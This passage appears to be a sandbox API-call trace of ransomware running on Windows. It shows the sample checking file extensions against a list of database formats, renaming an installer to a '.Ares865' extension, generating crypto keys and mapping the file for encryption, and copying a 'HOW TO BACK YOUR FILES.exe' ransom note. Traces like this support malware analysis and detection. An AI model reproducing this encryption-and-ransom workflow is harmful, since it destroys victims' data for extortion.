1 [0078.525] lstrlenW (lpString="4dl") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0078.525] lstrlenW (lpString="^^^") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0078.525] lstrlenW (lpString="abs") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0078.525] lstrlenW (lpString="abx") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0078.525] lstrlenW (lpString="accdb") returned 5 [0078.525] lstrcmpiW (lpString1="6.msi", lpString2="accdb") returned -1 [0078.525] lstrlenW (lpString="accdc") returned 5 [0078.525] lstrcmpiW (lpString1="6.msi", lpString2="accdc") returned -1 [0078.525] lstrlenW (lpString="accde") returned 5 [0078.525] lstrcmpiW (lpString1="6.msi", lpString2="accde") returned -1 [0078.525] lstrlenW (lpString="accdr") returned 5 [0078.525] lstrcmpiW (lpString1="6.msi", lpString2="accdr") returned -1 [0078.525] lstrlenW (lpString="accdt") returned 5 [0078.525] lstrcmpiW (lpString1="6.msi", lpString2="accdt") returned -1 [0078.525] lstrlenW (lpString="accdw") returned 5 [0078.525] lstrcmpiW (lpString1="6.msi", lpString2="accdw") returned -1 [0078.525] lstrlenW (lpString="accft") returned 5 [0078.525] lstrcmpiW (lpString1="6.msi", lpString2="accft") returned -1 [0078.525] lstrlenW (lpString="adb") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0078.525] lstrlenW (lpString="adb") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0078.526] lstrlenW (lpString="ade") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0078.526] lstrlenW (lpString="adf") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0078.526] lstrlenW (lpString="adn") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0078.526] lstrlenW (lpString="adp") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0078.526] lstrlenW (lpString="alf") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0078.526] lstrlenW (lpString="ask") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0078.526] lstrlenW (lpString="btr") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0078.526] lstrlenW (lpString="cat") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0078.526] lstrlenW (lpString="cdb") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0078.526] lstrlenW (lpString="ckp") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0078.526] lstrlenW (lpString="cma") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0078.526] lstrlenW (lpString="cpd") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0078.526] lstrlenW (lpString="dacpac") returned 6 [0078.526] lstrcmpiW (lpString1="86.msi", lpString2="dacpac") returned -1 [0078.526] lstrlenW (lpString="dad") returned 3 [0078.526] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0078.526] lstrlenW (lpString="dadiagrams") returned 10 [0078.526] lstrcmpiW (lpString1="al_x86.msi", lpString2="dadiagrams") returned -1 [0078.526] lstrlenW (lpString="daschema") returned 8 [0078.526] lstrcmpiW (lpString1="_x86.msi", lpString2="daschema") returned -1 [0078.526] lstrlenW (lpString="db-journal") returned 10 [0078.526] lstrcmpiW (lpString1="al_x86.msi", lpString2="db-journal") returned -1 [0078.526] lstrlenW (lpString="db-shm") returned 6 [0078.526] lstrcmpiW (lpString1="86.msi", lpString2="db-shm") returned -1 [0078.526] lstrlenW (lpString="db-wal") returned 6 [0078.527] lstrcmpiW (lpString1="86.msi", lpString2="db-wal") returned -1 [0078.527] lstrlenW (lpString="dbc") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0078.527] lstrlenW (lpString="dbs") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0078.527] lstrlenW (lpString="dbt") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0078.527] lstrlenW (lpString="dbv") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0078.527] lstrlenW (lpString="dbx") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0078.527] lstrlenW (lpString="dcb") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0078.527] lstrlenW (lpString="dct") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0078.527] lstrlenW (lpString="dcx") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0078.527] lstrlenW (lpString="ddl") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0078.527] lstrlenW (lpString="dlis") returned 4 [0078.527] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0078.527] lstrlenW (lpString="dp1") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0078.527] lstrlenW (lpString="dqy") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0078.527] lstrlenW (lpString="dsk") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0078.527] lstrlenW (lpString="dsn") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0078.527] lstrlenW (lpString="dtsx") returned 4 [0078.527] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0078.527] lstrlenW (lpString="dxl") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0078.527] lstrlenW (lpString="eco") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0078.527] lstrlenW (lpString="ecx") returned 3 [0078.527] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0078.527] lstrlenW (lpString="edb") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0078.528] lstrlenW (lpString="epim") returned 4 [0078.528] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0078.528] lstrlenW (lpString="fcd") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0078.528] lstrlenW (lpString="fdb") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0078.528] lstrlenW (lpString="fic") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0078.528] lstrlenW (lpString="flexolibrary") returned 12 [0078.528] lstrcmpiW (lpString1="onal_x86.msi", lpString2="flexolibrary") returned 1 [0078.528] lstrlenW (lpString="fm5") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0078.528] lstrlenW (lpString="fmp") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0078.528] lstrlenW (lpString="fmp12") returned 5 [0078.528] lstrcmpiW (lpString1="6.msi", lpString2="fmp12") returned -1 [0078.528] lstrlenW (lpString="fmpsl") returned 5 [0078.528] lstrcmpiW (lpString1="6.msi", lpString2="fmpsl") returned -1 [0078.528] lstrlenW (lpString="fol") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0078.528] lstrlenW (lpString="fp3") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0078.528] lstrlenW (lpString="fp4") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0078.528] lstrlenW (lpString="fp5") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0078.528] lstrlenW (lpString="fp7") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0078.528] lstrlenW (lpString="fpt") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0078.528] lstrlenW (lpString="frm") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0078.528] lstrlenW (lpString="gdb") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0078.528] lstrlenW (lpString="gdb") returned 3 [0078.528] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0078.528] lstrlenW (lpString="grdb") returned 4 [0078.529] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0078.529] lstrlenW (lpString="gwi") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0078.529] lstrlenW (lpString="hdb") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0078.529] lstrlenW (lpString="his") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0078.529] lstrlenW (lpString="ib") returned 2 [0078.529] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0078.529] lstrlenW (lpString="idb") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0078.529] lstrlenW (lpString="ihx") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0078.529] lstrlenW (lpString="itdb") returned 4 [0078.529] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0078.529] lstrlenW (lpString="itw") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0078.529] lstrlenW (lpString="jet") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0078.529] lstrlenW (lpString="jtx") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0078.529] lstrlenW (lpString="kdb") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0078.529] lstrlenW (lpString="kexi") returned 4 [0078.529] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0078.529] lstrlenW (lpString="kexic") returned 5 [0078.529] lstrcmpiW (lpString1="6.msi", lpString2="kexic") returned -1 [0078.529] lstrlenW (lpString="kexis") returned 5 [0078.529] lstrcmpiW (lpString1="6.msi", lpString2="kexis") returned -1 [0078.529] lstrlenW (lpString="lgc") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0078.529] lstrlenW (lpString="lwx") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0078.529] lstrlenW (lpString="maf") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0078.529] lstrlenW (lpString="maq") returned 3 [0078.529] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0078.529] lstrlenW (lpString="mar") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0078.530] lstrlenW (lpString="marshal") returned 7 [0078.530] lstrcmpiW (lpString1="x86.msi", lpString2="marshal") returned 1 [0078.530] lstrlenW (lpString="mas") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0078.530] lstrlenW (lpString="mav") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0078.530] lstrlenW (lpString="maw") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0078.530] lstrlenW (lpString="mdbhtml") returned 7 [0078.530] lstrcmpiW (lpString1="x86.msi", lpString2="mdbhtml") returned 1 [0078.530] lstrlenW (lpString="mdn") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0078.530] lstrlenW (lpString="mdt") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0078.530] lstrlenW (lpString="mfd") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0078.530] lstrlenW (lpString="mpd") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0078.530] lstrlenW (lpString="mrg") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0078.530] lstrlenW (lpString="mud") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0078.530] lstrlenW (lpString="mwb") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0078.530] lstrlenW (lpString="myd") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0078.530] lstrlenW (lpString="ndf") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0078.530] lstrlenW (lpString="nnt") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0078.530] lstrlenW (lpString="nrmlib") returned 6 [0078.530] lstrcmpiW (lpString1="86.msi", lpString2="nrmlib") returned -1 [0078.530] lstrlenW (lpString="ns2") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0078.530] lstrlenW (lpString="ns3") returned 3 [0078.530] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0078.530] lstrlenW (lpString="ns4") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0078.531] lstrlenW (lpString="nsf") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0078.531] lstrlenW (lpString="nv") returned 2 [0078.531] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0078.531] lstrlenW (lpString="nv2") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0078.531] lstrlenW (lpString="nwdb") returned 4 [0078.531] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0078.531] lstrlenW (lpString="nyf") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0078.531] lstrlenW (lpString="odb") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0078.531] lstrlenW (lpString="odb") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0078.531] lstrlenW (lpString="oqy") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0078.531] lstrlenW (lpString="ora") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0078.531] lstrlenW (lpString="orx") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0078.531] lstrlenW (lpString="owc") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0078.531] lstrlenW (lpString="p96") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0078.531] lstrlenW (lpString="p97") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0078.531] lstrlenW (lpString="pan") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0078.531] lstrlenW (lpString="pdb") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0078.531] lstrlenW (lpString="pdm") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0078.531] lstrlenW (lpString="pnz") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0078.531] lstrlenW (lpString="qry") returned 3 [0078.531] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0078.531] lstrlenW (lpString="qvd") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0078.532] lstrlenW (lpString="rbf") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0078.532] lstrlenW (lpString="rctd") returned 4 [0078.532] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0078.532] lstrlenW (lpString="rod") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0078.532] lstrlenW (lpString="rodx") returned 4 [0078.532] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0078.532] lstrlenW (lpString="rpd") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0078.532] lstrlenW (lpString="rsd") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0078.532] lstrlenW (lpString="sas7bdat") returned 8 [0078.532] lstrcmpiW (lpString1="_x86.msi", lpString2="sas7bdat") returned -1 [0078.532] lstrlenW (lpString="sbf") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0078.532] lstrlenW (lpString="scx") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0078.532] lstrlenW (lpString="sdb") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0078.532] lstrlenW (lpString="sdc") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0078.532] lstrlenW (lpString="sdf") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0078.532] lstrlenW (lpString="sis") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0078.532] lstrlenW (lpString="spq") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0078.532] lstrlenW (lpString="te") returned 2 [0078.532] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0078.532] lstrlenW (lpString="teacher") returned 7 [0078.532] lstrcmpiW (lpString1="x86.msi", lpString2="teacher") returned 1 [0078.532] lstrlenW (lpString="tmd") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0078.532] lstrlenW (lpString="tps") returned 3 [0078.532] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0078.532] lstrlenW (lpString="trc") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0078.533] lstrlenW (lpString="trc") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0078.533] lstrlenW (lpString="trm") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0078.533] lstrlenW (lpString="udb") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0078.533] lstrlenW (lpString="udl") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0078.533] lstrlenW (lpString="usr") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0078.533] lstrlenW (lpString="v12") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0078.533] lstrlenW (lpString="vis") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0078.533] lstrlenW (lpString="vpd") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0078.533] lstrlenW (lpString="vvv") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0078.533] lstrlenW (lpString="wdb") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0078.533] lstrlenW (lpString="wmdb") returned 4 [0078.533] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0078.533] lstrlenW (lpString="wrk") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0078.533] lstrlenW (lpString="xdb") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0078.533] lstrlenW (lpString="xld") returned 3 [0078.533] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0078.533] lstrlenW (lpString="xmlff") returned 5 [0078.533] lstrcmpiW (lpString1="6.msi", lpString2="xmlff") returned -1 [0078.533] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865") returned 153 [0078.533] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.ares865"), dwFlags=0x1) returned 1 [0078.619] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.619] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0078.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0078.620] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0078.620] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0078.620] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0078.621] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23300, lpName=0x0) returned 0x15c [0078.625] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23300) returned 0x420000 [0078.855] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0078.856] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0078.856] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0078.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0078.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0078.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0078.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0078.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.856] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0078.858] CloseHandle (hObject=0x15c) returned 1 [0078.858] CloseHandle (hObject=0x118) returned 1 [0078.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0078.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.859] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeab3900, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfeab3900, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfeab3900, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0078.859] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0078.859] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2568 [0078.859] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0078.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2870 | out: hHeap=0x2b0000) returned 1 [0078.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0078.859] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned 83 [0078.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0078.859] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.859] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.860] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.860] GetLastError () returned 0x20 [0078.860] Sleep (dwMilliseconds=0xc8) [0079.062] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.062] GetLastError () returned 0x20 [0079.062] Sleep (dwMilliseconds=0xc8) [0079.259] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.269] GetLastError () returned 0x0 [0079.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0079.269] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, 